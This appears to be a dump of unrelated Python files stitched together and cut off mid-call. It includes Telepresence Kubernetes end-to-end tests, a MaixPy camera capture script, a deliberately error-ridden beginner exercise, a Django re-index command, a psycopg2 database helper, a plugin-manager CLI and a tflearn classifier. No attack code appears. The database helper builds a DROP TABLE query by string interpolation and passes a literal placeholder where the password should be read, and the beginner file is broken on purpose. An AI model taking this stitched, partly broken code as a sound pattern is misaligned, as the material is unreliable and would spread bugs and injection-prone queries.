""" import json from unittest import TestCase, skipIf, skipUnless from subprocess import ( check_output, Popen, PIPE, CalledProcessError, check_call, run, STDOUT, ) import time import os from .utils import ( DIRECTORY, random_name, run_webserver, telepresence_version, current_namespace, OPENSHIFT, KUBECTL, query_in_k8s, ) REGISTRY = os.environ.get("TELEPRESENCE_REGISTRY", "datawire") # inject-tcp/vpn-tcp/container: TELEPRESENCE_METHOD = os.environ["TELEPRESENCE_METHOD"] # If this env variable is set, we know we're using minikube or minishift: LOCAL_VM = os.environ.get("TELEPRESENCE_LOCAL_VM") is not None EXISTING_DEPLOYMENT = """\ --- apiVersion: v1 kind: ConfigMap metadata: name: {name} namespace: {namespace} data: EXAMPLE_ENVFROM: foobar EX_MULTI_LINE: | first line (no newline before, newline after) second line (newline before and after) --- %s metadata: name: {name} namespace: {namespace} spec: replicas: {replicas} template: metadata: labels: name: {name} hello: monkeys # <-- used by volumes test spec: containers: # Extra container at start to demonstrate we can handle multiple # containers - name: getintheway image: openshift/hello-openshift resources: limits: cpu: "100m" memory: "150Mi" - name: {container_name} image: {image} envFrom: - configMapRef: name: {name} env: - name: MYENV value: hello volumeMounts: - name: podinfo mountPath: /podinfo resources: requests: cpu: "100m" memory: "150Mi" limits: cpu: "100m" memory: "150Mi" volumes: - name: podinfo downwardAPI: items: - path: "labels" fieldRef: fieldPath: metadata.labels """ if OPENSHIFT: EXISTING_DEPLOYMENT = EXISTING_DEPLOYMENT % ("""\ apiVersion: v1 kind: DeploymentConfig""",) DEPLOYMENT_TYPE = "deploymentconfig" else: EXISTING_DEPLOYMENT = EXISTING_DEPLOYMENT % ("""\ apiVersion: extensions/v1beta1 kind: Deployment""",) DEPLOYMENT_TYPE = "deployment" NAMESPACE_YAML = """\ apiVersion: v1 kind: Namespace metadata: name: {} """ def run_script_test(telepresence_args, local_command): """Run a script with Telepresence.""" p = Popen( args=["telepresence"] + telepresence_args + [ "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run-shell", ], cwd=str(DIRECTORY), stdin=PIPE, ) p.stdin.write(bytes(local_command, "ascii") + b"\n") p.stdin.flush() p.stdin.close() return p.wait() def assert_fromcluster(namespace, service_name, port, telepresence_process): """Assert that there's a webserver accessible from the cluster.""" url = "http://{}:{}/__init__.py".format(service_name, port) expected = (DIRECTORY / "__init__.py").read_bytes() for i in range(30): result = query_in_k8s(namespace, url, telepresence_process) if result != expected: time.sleep(1) else: break assert result == expected print("Hooray, got expected result when querying via cluster.") @skipIf(TELEPRESENCE_METHOD == "container", "non-Docker tests") class NativeEndToEndTests(TestCase): """ End-to-end tests on the native machine. 
""" def test_run_directly(self): """--run runs the command directly.""" webserver_name = run_webserver() p = Popen( args=[ "telepresence", "--method", TELEPRESENCE_METHOD, "--new-deployment", random_name(), "--logfile", "-", "--run", "python3", "tocluster.py", webserver_name, current_namespace(), ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert exit_code == 113 @skipIf(TELEPRESENCE_METHOD != "vpn-tcp", "this uses vpn-tcp.") def test_run_directly_implicit_method(self): """--method is optional.""" webserver_name = run_webserver() p = Popen( args=[ "telepresence", "--new-deployment", random_name(), "--logfile", "-", "--run", "python3", "tocluster.py", webserver_name, current_namespace(), ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert exit_code == 113 def test_run_directly_implicit_deployment(self): """--*deployment is optional.""" webserver_name = run_webserver() p = Popen( args=[ "telepresence", "--method", TELEPRESENCE_METHOD, "--logfile", "-", "--run", "python3", "tocluster.py", webserver_name, current_namespace(), ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert exit_code == 113 @skipIf(OPENSHIFT, "OpenShift Online doesn't do namespaces") def create_namespace(self): """Create a new namespace, return its name.""" name = random_name() yaml = NAMESPACE_YAML.format(name).encode("utf-8") check_output( args=[ KUBECTL, "apply", "-f", "-", ], input=yaml, ) self.addCleanup( lambda: check_output([KUBECTL, "delete", "namespace", name]) ) return name def test_tocluster(self): """ Tests of communication to the cluster. """ webserver_name = run_webserver() exit_code = run_script_test( ["--new-deployment", random_name()], "python3 tocluster.py {} {}".format( webserver_name, current_namespace() ), ) assert exit_code == 113 def test_tocluster_with_namespace(self): """ Tests of communication to the cluster with non-default namespace. """ namespace = self.create_namespace() webserver_name = run_webserver(namespace) exit_code = run_script_test( ["--new-deployment", random_name(), "--namespace", namespace], "python3 tocluster.py {} {}".format(webserver_name, namespace), ) assert exit_code == 113 def fromcluster( self, telepresence_args, url, namespace, local_port, remote_port=None ): """ Test of communication from the cluster. Start webserver that serves files from this directory. Run HTTP query against it on the Kubernetes cluster, compare to real file. """ if remote_port is None: port_string = str(local_port) remote_port = local_port else: port_string = "{}:{}".format(local_port, remote_port) args = ["telepresence"] + telepresence_args + [ "--expose", port_string, "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run-shell", ] p = Popen(args=args, stdin=PIPE, stderr=STDOUT, cwd=str(DIRECTORY)) p.stdin.write( ("sleep 1; exec python3 -m http.server %s\n" % (local_port, )).encode("ascii") ) p.stdin.flush() try: assert_fromcluster(namespace, url, remote_port, p) finally: p.stdin.close() p.terminate() p.wait() def test_fromcluster(self): """ Communicate from the cluster to Telepresence, with default namespace. """ service_name = random_name() self.fromcluster( ["--new-deployment", service_name], service_name, current_namespace(), 12370, ) def test_fromcluster_custom_local_port(self): """ The cluster can talk to a process running in a Docker container, with the local process listening on a different port. 
""" service_name = random_name() remote_port = 12360 local_port = 12355 p = Popen( args=[ "telepresence", "--new-deployment", service_name, "--expose", "{}:{}".format(local_port, remote_port), "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run", "python3", "-m", "http.server", str(local_port) ], cwd=str(DIRECTORY), ) assert_fromcluster(current_namespace(), service_name, remote_port, p) p.terminate() p.wait() def test_fromcluster_with_namespace(self): """ Communicate from the cluster to Telepresence, with custom namespace. """ namespace = self.create_namespace() service_name = random_name() self.fromcluster( ["--new-deployment", service_name, "--namespace", namespace], "{}.{}.svc.cluster.local".format(service_name, namespace), namespace, 12347, ) @skipIf(OPENSHIFT, "OpenShift never allows running containers as root.") def test_fromcluster_port_lt_1024(self): """ Communicate from the cluster to Telepresence, with port<1024. """ service_name = random_name() self.fromcluster( ["--new-deployment", service_name], service_name, current_namespace(), 12399, 70, ) @skipIf(OPENSHIFT, "OpenShift never allows running containers as root.") def test_swapdeployment_fromcluster_port_lt_1024(self): """ Communicate from the cluster to Telepresence, with port<1024, using swap-deployment because omg it's a different code path. Yay. """ # Create a non-Telepresence deployment: service_name = random_name() check_call([ KUBECTL, "run", service_name, "--port=79", "--expose", "--restart=Always", "--image=openshift/hello-openshift", "--replicas=2", "--labels=telepresence-test=" + service_name, "--env=HELLO=there", ]) self.addCleanup( check_call, [KUBECTL, "delete", DEPLOYMENT_TYPE, service_name] ) self.fromcluster( ["--swap-deployment", service_name], service_name, current_namespace(), 12398, 79, ) def test_loopback(self): """The shell run by telepresence can access localhost.""" p = Popen(["python3", "-m", "http.server", "12346"], cwd=str(DIRECTORY)) def cleanup(): p.terminate() p.wait() self.addCleanup(cleanup) name = random_name() p = Popen( args=[ "telepresence", "--method", TELEPRESENCE_METHOD, "--new-deployment", name, "--run-shell", ], stdin=PIPE, stdout=PIPE, cwd=str(DIRECTORY) ) result, _ = p.communicate( b"curl --silent http://localhost:12346/test_run.py\n" ) # We're loading this file via curl, so it should have the string # "cuttlefish" which is in this comment and unlikely to appear by # accident. assert b"cuttlefish" in result def test_disconnect(self): """Telepresence exits if the connection is lost.""" exit_code = run_script_test(["--new-deployment", random_name()], "python3 disconnect.py") # Exit code 3 means proxy exited prematurely: assert exit_code == 3 @skipIf( LOCAL_VM and TELEPRESENCE_METHOD == "vpn-tcp", "--deployment doesn't work on local VMs with vpn-tcp method." 
) def existingdeployment(self, namespace, script): if namespace is None: namespace = current_namespace() webserver_name = run_webserver(namespace) # Create a Deployment outside of Telepresence: name = random_name() image = "{}/telepresence-k8s:{}".format( REGISTRY, telepresence_version() ) deployment = EXISTING_DEPLOYMENT.format( name=name, container_name=name, image=image, namespace=namespace, replicas="1", ) check_output( args=[ KUBECTL, "apply", "-f", "-", ], input=deployment.encode("utf-8") ) def cleanup(): check_output([ KUBECTL, "delete", DEPLOYMENT_TYPE, name, "--namespace=" + namespace ]) check_output([ KUBECTL, "delete", "ConfigMap", name, "--namespace=" + namespace ]) self.addCleanup(cleanup) args = ["--deployment", name, "--namespace", namespace] exit_code = run_script_test( args, "python3 {} {} {}".format( script, webserver_name, namespace, ) ) assert 113 == exit_code def test_existingdeployment(self): """ Tests of communicating with existing Deployment. """ self.existingdeployment(None, "tocluster.py") def test_environmentvariables(self): """ Local processes get access to env variables directly set and set via envFrom. """ self.existingdeployment(None, "envvariables.py") def test_existingdeployment_custom_namespace(self): """ Tests of communicating with existing Deployment in a custom namespace. """ self.existingdeployment(self.create_namespace(), "tocluster.py") def test_volumes(self): """ Volumes are accessible locally. """ self.existingdeployment(None, "volumes.py") def test_unsupportedtools(self): """ Unsupported command line tools like ping fail nicely. """ p = Popen( args=[ "telepresence", "--method", TELEPRESENCE_METHOD, "--new-deployment", random_name(), "--logfile", "-", "--run", "python3", "unsupportedcli.py", ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert exit_code == 113 def test_swapdeployment(self): """ --swap-deployment swaps out Telepresence pod and then swaps it back on exit, when original pod was created with `kubectl run` or `oc run`. """ # Create a non-Telepresence deployment: name = random_name() check_call([ KUBECTL, "run", name, "--restart=Always", "--image=openshift/hello-openshift", "--replicas=2", "--labels=telepresence-test=" + name, "--env=HELLO=there", ]) self.addCleanup(check_call, [KUBECTL, "delete", DEPLOYMENT_TYPE, name]) self.assert_swapdeployment(name, 2, "telepresence-test=" + name) def test_swapdeployment_swap_args(self): """ --swap-deployment swaps out Telepresence pod and overrides the entrypoint. """ # Create a non-Telepresence deployment: name = random_name() check_call([ KUBECTL, "run", name, "--restart=Always", "--image=openshift/hello-openshift", "--replicas=2", "--labels=telepresence-test=" + name, "--env=HELLO=there", "--", "/hello-openshift", ]) self.addCleanup(check_call, [KUBECTL, "delete", DEPLOYMENT_TYPE, name]) self.assert_swapdeployment(name, 2, "telepresence-test=" + name) @skipIf(not OPENSHIFT, "Only runs on OpenShift") def test_swapdeployment_ocnewapp(self): """ --swap-deployment works on pods created via `oc new-app`. """ name = random_name() check_call([ "oc", "new-app", "--name=" + name, "--docker-image=openshift/hello-openshift", "--env=HELLO=there", ]) self.addCleanup( check_call, ["oc", "delete", "dc,imagestream,service", name] ) self.assert_swapdeployment(name, 1, "app=" + name) def assert_swapdeployment(self, name, replicas, selector): """ --swap-deployment swaps out Telepresence pod and then swaps it back on exit. 
""" webserver_name = run_webserver() p = Popen( args=[ "telepresence", "--swap-deployment", name, "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run", "python3", "tocluster.py", webserver_name, current_namespace(), "HELLO=there" ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert 113 == exit_code deployment = json.loads( str( check_output([ KUBECTL, "get", DEPLOYMENT_TYPE, name, "-o", "json", "--export" ]), "utf-8" ) ) # We swapped back: assert deployment["spec"]["replicas"] == replicas # Ensure pods swap back too: start = time.time() while time.time() - start < 60: pods = json.loads( str( check_output([ KUBECTL, "get", "pod", "--selector=" + selector, "-o", "json", "--export" ]), "utf-8" ) )["items"] if [ pod["spec"]["containers"][0]["image"] .startswith("openshift/hello-openshift") for pod in pods ] == [True] * len(pods): print("Found openshift!") return time.sleep(1) assert False, "Didn't switch back to openshift" def test_swapdeployment_explicit_container(self): """ --swap-deployment : swaps out the given container. """ # Create a non-Telepresence Deployment with multiple containers: name = random_name() container_name = random_name() deployment = EXISTING_DEPLOYMENT.format( name=name, container_name=container_name, image="openshift/hello-openshift", namespace=current_namespace(), replicas=2 ) check_output( args=[ KUBECTL, "apply", "-f", "-", ], input=deployment.encode("utf-8") ) self.addCleanup( check_output, [ KUBECTL, "delete", DEPLOYMENT_TYPE, name, ] ) p = Popen( args=[ "telepresence", "--swap-deployment", "{}:{}".format(name, container_name), "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run", "python3", "volumes.py" ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert 113 == exit_code def test_swapdeployment_auto_expose(self): """ --swap-deployment auto-exposes ports listed in the Deployment. Important that the test uses port actually used by original container, otherwise we will miss bugs where a telepresence proxy container is added rather than being swapped. """ service_name = random_name() check_call([ KUBECTL, "run", service_name, "--port=8888", "--expose", "--restart=Always", "--image=openshift/hello-openshift", "--replicas=2", "--labels=telepresence-test=" + service_name, "--env=HELLO=there", ]) self.addCleanup( check_call, [KUBECTL, "delete", DEPLOYMENT_TYPE, service_name] ) port = 8888 # Explicitly do NOT use '--expose 8888', to see if it's auto-detected: p = Popen( args=[ "telepresence", "--swap-deployment", service_name, "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run", "python3", "-m", "http.server", str(port) ], cwd=str(DIRECTORY), ) assert_fromcluster(current_namespace(), service_name, port, p) p.terminate() p.wait() @skipUnless(TELEPRESENCE_METHOD == "container", "requires Docker") class DockerEndToEndTests(TestCase): """End-to-end tests on Docker.""" def get_containers(self): return set(check_output(["docker", "ps", "-q"]).split()) def setUp(self): self.containers = self.get_containers() def tearDown(self): # Ensure no container leaks time.sleep(1) assert self.containers == self.get_containers() def test_tocluster(self): """ Tests of communication to the cluster from a Docker container. 
""" webserver_name = run_webserver() result = run([ "telepresence", "--logfile", "-", "--method", "container", "--new-deployment", random_name(), "--docker-run", "-v", "{}:/host".format(DIRECTORY), "python:3-alpine", "python3", "/host/tocluster.py", webserver_name, current_namespace(), ]) assert result.returncode == 113 def test_fromcluster(self): """ The cluster can talk to a process running in a Docker container. """ service_name = random_name() port = 12350 p = Popen( args=[ "telepresence", "--new-deployment", service_name, "--expose", str(port), "--logfile", "-", "--method", "container", "--docker-run", "-v", "{}:/host".format(DIRECTORY), "--workdir", "/host", "python:3-alpine", "python3", "-m", "http.server", str(port) ], ) assert_fromcluster(current_namespace(), service_name, port, p) p.terminate() p.wait() def test_fromcluster_custom_local_port(self): """ The cluster can talk to a process running in a Docker container, with the local process listening on a different port. """ service_name = random_name() remote_port = 12350 local_port = 7777 p = Popen( args=[ "telepresence", "--new-deployment", service_name, "--expose", "{}:{}".format( local_port, remote_port ), "--logfile", "-", "--method", "container", "--docker-run", "-v", "{}:/host".format(DIRECTORY), "--workdir", "/host", "python:3-alpine", "python3", "-m", "http.server", str(local_port) ], ) try: assert_fromcluster( current_namespace(), service_name, remote_port, p ) finally: p.terminate() p.wait() def test_volumes(self): """ Test availability of volumes in the container. """ result = run([ "telepresence", "--logfile", "-", "--new-deployment", random_name(), "--docker-run", "-v", "{}:/host".format(DIRECTORY), "python:3-alpine", "python3", "/host/volumes_simpler.py", ]) assert result.returncode == 113 def test_env_variables(self): # Local env variables shouldn't be used environ = os.environ.copy() environ["SHOULD_NOT_BE_SET"] = "This env variable has a space" # But env variables from remote cluster should be, and tocluster.py # checks those: webserver_name = run_webserver() result = run([ "telepresence", "--logfile", "-", "--method", "container", "--new-deployment", random_name(), "--docker-run", "-v", "{}:/host".format(DIRECTORY), "python:3-alpine", "python3", "/host/tocluster.py", webserver_name, current_namespace(), ], env=environ) assert result.returncode == 113 1-10 import audio import gc import image import lcd import sensor import sys import time import uos import os from fpioa_manager import * from machine import I2C from Maix import I2S, GPIO from pmu import axp192 # # initialize # lcd.init() lcd.rotation(2) # reduce screen brightness pmu = axp192() pmu.setScreenBrightness(8) #[0..15] try: from pmu import axp192 pmu = axp192() pmu.enablePMICSleepMode(True) except: pass fm.register(board_info.SPK_SD, fm.fpioa.GPIO0) spk_sd=GPIO(GPIO.GPIO0, GPIO.OUT) spk_sd.value(1) #Enable the SPK output fm.register(board_info.SPK_DIN,fm.fpioa.I2S0_OUT_D1) fm.register(board_info.SPK_BCLK,fm.fpioa.I2S0_SCLK) fm.register(board_info.SPK_LRCLK,fm.fpioa.I2S0_WS) wav_dev = I2S(I2S.DEVICE_0) fm.register(board_info.BUTTON_A, fm.fpioa.GPIO1) but_a=GPIO(GPIO.GPIO1, GPIO.IN, GPIO.PULL_UP) #PULL_UP is required here! fm.register(board_info.BUTTON_B, fm.fpioa.GPIO2) but_b = GPIO(GPIO.GPIO2, GPIO.IN, GPIO.PULL_UP) #PULL_UP is required here! 
def findMaxIDinDir(dirname): larNum = -1 try: dirList = uos.listdir(dirname) for fileName in dirList: currNum = int(fileName.split(".jpg")[0]) if currNum > larNum: larNum = currNum return larNum except: return 0 def play_sound(filename): try: player = audio.Audio(path = filename) player.volume(20) wav_info = player.play_process(wav_dev) wav_dev.channel_config(wav_dev.CHANNEL_1, I2S.TRANSMITTER,resolution = I2S.RESOLUTION_16_BIT, align_mode = I2S.STANDARD_MODE) wav_dev.set_sample_rate(wav_info[1]) spk_sd.value(1) while True: ret = player.play() if ret == None: break elif ret==0: break player.finish() spk_sd.value(0) except: pass def initialize_camera(): err_counter = 0 while 1: try: sensor.reset() #Reset sensor may failed, let's try some times break except: err_counter = err_counter + 1 if err_counter == 20: lcd.draw_string(lcd.width()//2-100,lcd.height()//2-4, "Error: Sensor Init Failed", lcd.WHITE, lcd.RED) time.sleep(0.1) continue sensor.set_pixformat(sensor.RGB565) # The memory can't analyze models with resolution higher than QVGA # So better we train the model with QVGA too sensor.set_framesize(sensor.QVGA) #QVGA=320x240 #sensor.set_framesize(sensor.VGA) #VGA=640x480 # Optimze this settings to get best picture quality sensor.set_auto_exposure(False, exposure_us=500) sensor.set_auto_gain(False) #, gain_db=100) # must turn this off to prevent image washout... sensor.set_auto_whitebal(True) # turn this off for color tracking sensor.run(1) try: img = image.Image("/sd/startup.jpg") lcd.display(img) except: lcd.draw_string(lcd.width()//2-100,lcd.height()//2-4, "Error: Cannot find start.jpg", lcd.WHITE, lcd.RED) time.sleep(2) initialize_camera() currentDirectory = 1 if "sd" not in os.listdir("/"): lcd.draw_string(lcd.width()//2-96,lcd.height()//2-4, "Error: Cannot read SD Card", lcd.WHITE, lcd.RED) try: os.mkdir("/sd/train") except Exception as e: pass try: os.mkdir("/sd/vaild") except Exception as e: pass try: currentImage = max(findMaxIDinDir("/sd/train/" + str(currentDirectory)), findMaxIDinDir("/sd/vaild/" + str(currentDirectory))) + 1 except: currentImage = 0 pass isButtonPressedA = 0 isButtonPressedB = 0 try: while(True): img = sensor.snapshot() if but_a.value() == 0 and isButtonPressedA == 0: if currentImage <= 30 or currentImage > 35: try: if str(currentDirectory) not in os.listdir("/sd/train"): try: os.mkdir("/sd/train/" + str(currentDirectory)) except: pass img.save("/sd/train/" + str(currentDirectory) + "/" + str(currentImage) + ".jpg", quality=95) play_sound("/sd/kacha.wav") except: lcd.draw_string(lcd.width()//2-124,lcd.height()//2-4, "Error: Cannot Write to SD Card", lcd.WHITE, lcd.RED) time.sleep(1) else: try: if str(currentDirectory) not in os.listdir("/sd/vaild"): try: os.mkdir("/sd/vaild/" + str(currentDirectory)) except: pass img.save("/sd/vaild/" + str(currentDirectory) + "/" + str(currentImage) + ".jpg", quality=95) play_sound("/sd/kacha.wav") except: lcd.draw_string(lcd.width()//2-124,lcd.height()//2-4, "Error: Cannot Write to SD Card", lcd.WHITE, lcd.RED) time.sleep(1) currentImage = currentImage + 1 isButtonPressedA = 1 if but_a.value() == 1: isButtonPressedA = 0 if but_b.value() == 0 and isButtonPressedB == 0: currentDirectory = currentDirectory + 1 if currentDirectory == 11: currentDirectory = 1 currentImage = max(findMaxIDinDir("/sd/train/" + str(currentDirectory)), findMaxIDinDir("/sd/vaild/" + str(currentDirectory))) + 1 isButtonPressedB = 1 if but_b.value() == 1: isButtonPressedB = 0 # scale sensor image to display size img2 = img.resize(180,135) # LCD: 135*240 
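        # Downscale the QVGA frame so the preview fits the 135*240 LCD before
        # the counter overlay is drawn on it.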
        #img2.draw_string(0,0,"Train:%03d/35 Class:%02d/10"%(currentImage,currentDirectory),color=(255,255,255),scale=1)
        img2.draw_string(0,0,"T%02d C%02d"%(currentImage,currentDirectory),color=(0,255 ,0),scale=3)
        lcd.display(img2)
except KeyboardInterrupt:
    pass

print("I'm full of errors");
##print(some errors will stop the code running)
print("some will run but not give the right result")
# print("hi mum")

a_number = 3
_another = 65
#1_number = 11
#This is a comment line

pet1, pet2 = "cat", "dog"
#pet3 = pet4 = pet5 = "dog" = "cat"

a_string = "Hello World!"
print(a_string[-1:-6])

num_string = "10"
num_int = int(num_string,2)
num_int+=1
print(str(num_int) + " is 11")

from django.core.management.base import BaseCommand
from django.db import transaction

from hexa.catalog.models import Index
from hexa.pipelines.models import PipelinesIndex
from hexa.plugins.app import get_connector_app_configs


class Command(BaseCommand):
    help = "Re-index all content"

    def handle(self, *args, **options):
        self.stdout.write(f"Re-indexing...")
        self.stdout.write("Deleting existing catalog indexes")
        Index.objects.all().delete()
        self.stdout.write("Deleting existing pipelines indexes")
        PipelinesIndex.objects.all().delete()
        for app_config in get_connector_app_configs():
            app_model_classes = list(app_config.get_models())
            indexed_model_classes = [
                mc
                for mc in app_model_classes
                if hasattr(mc, "index") and callable(getattr(mc, "index"))
            ]
            with transaction.atomic():
                self.stdout.write(f"Re-indexing content for {app_config.label}")
                for indexed_model_class in indexed_model_classes:
                    for index_object in indexed_model_class.objects.all():
                        self.stdout.write(f"Re-indexing {index_object}")
                        index_object.save()
        self.stdout.write(self.style.SUCCESS("Done"))

from pathlib import Path
from pathlib import PurePath

def get_clock_path():
    current_path = Path.cwd()
    # FIXME: hardcode for linux file system
    local_html = 'file://' + str(PurePath(current_path,'index.html'))
    web_url = 'https://jonathancychow.github.io/countdown/'
    # FIXME: hardcode for reading local html
    url = local_html
    return url

def substitute_dict(d, replacement):
    return dict(
        (k, ((d[k] in replacement) and replacement[d[k]] or d[k]))
        for k in d
    )

x = {
    "foo": "bar",
    "bum": "butt"
}
y = {
    "butt": "poo"
}

print(substitute_dict(x, y))

Storj/metadisk-client-python
import unittest

from pymdc.rest import REST


class TestRest(unittest.TestCase):
    def test_rest(self):
        self.assertTrue(type(REST("GET", "/")) == dict)

jakubarendac/fingerflow
from ..MinutiaeNet.FineNet import fine_net_model
from ..
import constants def get_classify_net_model(pretrained_path, num_classes=constants.MINUTIAE_CLASSES): return fine_net_model.get_fine_net_model( num_classes, pretrained_path, constants.INPUT_SHAPE, "ClassifyNet", "classification_layer") python/ql/test/query-tests/Security/CWE-215/settings.py ALWAYS_TRUE = True import psycopg2 import os from dotenv import load_dotenv load_dotenv() class DataBaseBehavior: @staticmethod def create_connection(): try: return psycopg2.connect( f"dbname='{os.environ.get('POSTGRES_DB')}'" f"user='{os.environ.get('POSTGRES_USER')}' " f"host='{os.environ.get('POSTGRES_HOST')}' " f"password='{('POSTGRES_PASSWORD')}'" ) except (Exception, psycopg2.DatabaseError) as error: print(error) except (Exception, psycopg2.OperationalError) as error: print(error) @staticmethod def destroy_connection(connection): if connection is not None: connection.commit() connection.close() @staticmethod def execute_sql(cursor, query, values=None): records = None try: if 'INSERT' in query: cursor.execute(query, values) else: cursor.execute(query) except (Exception, psycopg2.Error) as error: print(error) finally: if cursor is not None: cursor.close() return records class DataBaseManager(DataBaseBehavior): def create_table(self, query): conn = self.create_connection() cursor = conn.cursor() self.execute_sql(cursor, query) self.destroy_connection(conn) def drop_table(self, table_name): query = f"DROP TABLE {table_name}" conn = self.create_connection() cursor = conn.cursor() self.execute_sql(cursor, query) self.destroy_connection(conn) def insert_data_into_crash_canvas_history(self, values: tuple): query = f"INSERT INTO crash_canvas_history (uuid, rate, date_hour) VALUES (%s,%s,%s)" conn = self.create_connection() cursor = conn.cursor() self.execute_sql(cursor, query, values) self.destroy_connection(conn) """ This module implements a simple command line tool that wraps the REST management interface of son-plugin-manager. """ import argparse import requests import json def plugin_list(endpoint): r = requests.get("%s/api/plugins" % endpoint) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def plugin_info(uuid, endpoint): r = requests.get("%s/api/plugins/%s" % (endpoint, uuid)) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def plugin_remove(uuid, endpoint): r = requests.delete("%s/api/plugins/%s" % (endpoint, uuid)) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def plugin_lifecycle_start(uuid, endpoint): req = {"target_state": "start"} r = requests.put("%s/api/plugins/%s/lifecycle" % (endpoint, uuid), json=json.dumps(req)) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def plugin_lifecycle_pause(uuid, endpoint): req = {"target_state": "pause"} r = requests.put("%s/api/plugins/%s/lifecycle" % (endpoint, uuid), json=json.dumps(req)) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def plugin_lifecycle_stop(uuid, endpoint): req = {"target_state": "stop"} r = requests.put("%s/api/plugins/%s/lifecycle" % (endpoint, uuid), json=json.dumps(req)) if r.status_code != 200: _request_failed(r.status_code) print(r.json()) def _argument_missing(arg="UUID"): print("Error: Missing argument %r." % arg) print("Run with --help to get more info.") print("Abort.") exit(0) def _request_failed(code): print("Request failed with code %r." 
% code) print("Abort.") exit(0) parser = argparse.ArgumentParser(description='son-pm-cli') parser.add_argument( "command", choices=['list', 'info', 'remove', 'lifecycle-start', 'lifecycle-pause', 'lifecycle-stop'], help="Action to be executed.") parser.add_argument( "--uuid", "-u", dest="uuid", help="UUID of the plugin to be manipulated.") parser.add_argument( "--endpoint", "-e", dest="endpoint", default="http://127.0.0.1:8001", help="UUID of the plugin to be manipulated.") def main(): args = vars(parser.parse_args()) # basic input checks if args.get("command") != "list" and args.get("uuid") is None: _argument_missing() # call command functions (yeah, static mapping is not nice, I know) if args.get("command") == "list": plugin_list(args.get("endpoint")) elif args.get("command") == "info": plugin_info(args.get("uuid"), args.get("endpoint")) elif args.get("command") == "remove": plugin_remove(args.get("uuid"), args.get("endpoint")) elif args.get("command") == "lifecycle-start": plugin_lifecycle_start(args.get("uuid"), args.get("endpoint")) elif args.get("command") == "lifecycle-pause": plugin_lifecycle_pause(args.get("uuid"), args.get("endpoint")) elif args.get("command") == "lifecycle-stop": plugin_lifecycle_stop(args.get("uuid"), args.get("endpoint")) if __name__ == '__main__': main() # Created by sihan at 2018-10-30 import os import matplotlib.pyplot as plt import numpy as np import tensorflow as tf import tflearn from tflearn.layers.conv import conv_2d, max_pool_2d from tflearn.layers.core import input_data, dropout, fully_connected from tflearn.layers.estimator import regression os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' IMG_SIZE = 64 LR = 1e-4 MODEL_NAME = 'dogsVScats-{}-{}-{}.model'.format(LR, IMG_SIZE, '2conv-basic') tf.reset_default_graph() convnet = input_data(shape=[None, IMG_SIZE, IMG_SIZE, 1], name='input') convnet = conv_2d(convnet, 32, 5, activation='relu') convnet = max_pool_2d(convnet, 5) convnet = conv_2d(convnet, 64, 5, activation='relu') convnet = max_pool_2d(convnet, 5) convnet = conv_2d(convnet, 128, 5, activation='relu') convnet = max_pool_2d(convnet, 5) convnet = conv_2d(convnet, 64, 5, activation='relu') convnet = max_pool_2d(convnet, 5) convnet = conv_2d(convnet, 32, 5, activation='relu') convnet = max_pool_2d(convnet, 5) convnet = fully_connected(convnet, 1024, activation='relu') convnet = dropout(convnet, 0.8) convnet = fully_connected(convnet, 2, activation='softmax') convnet = regression(convnet, optimizer='adam', learning_rate=LR, loss='categorical_crossentropy', name='targets') model = tflearn.DNN(convnet, tensorboard_dir='log') model.load(r'./checkPoint_2conv/' + MODEL_NAME) print('model loaded!') test_data = np.load('./data/test_data_proc_'+str(IMG_SIZE)+'_12500.npy') fig = plt.figure() for num, data in enumerate(test_data[:20]): # cat: [1,0] # dog: [0,1] img_num = data[1] img_data = data[0] y = fig.add_subplot(5, 4, num + 1) orig = img_data data = img_data.reshape(IMG_SIZE, IMG_SIZE, 1) model_out = model.predict([data])[0] if np.argmax(model_out) == 1: str_label = 'Dog' else: str_label = 'Cat' y.imshow(orig, cmap='gray') plt.title(str_label) y.axes.get_xaxis().set_visible(False) y.axes.get_yaxis().set_visible(False) plt.show() # now = str(time.time()) # plt.savefig(r'..\..\resources\\' + MODEL_NAME + "_" + now+".png") import os import pytest from conda_verify import utilities from conda_verify.verify import Verify from conda_verify.errors import RecipeError @pytest.fixture def recipe_dir(): return os.path.join(os.path.dirname(__file__), 'test_recipes') def 
test_invalid_package_field(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_field') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2109] Found invalid section "extra_field"' in error def test_invalid_package_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "extra" in section "package"' in error def test_invalid_source_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_source_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "sha3" in section "source"' in error def test_invalid_multiple_source_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_multiple_sources') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, 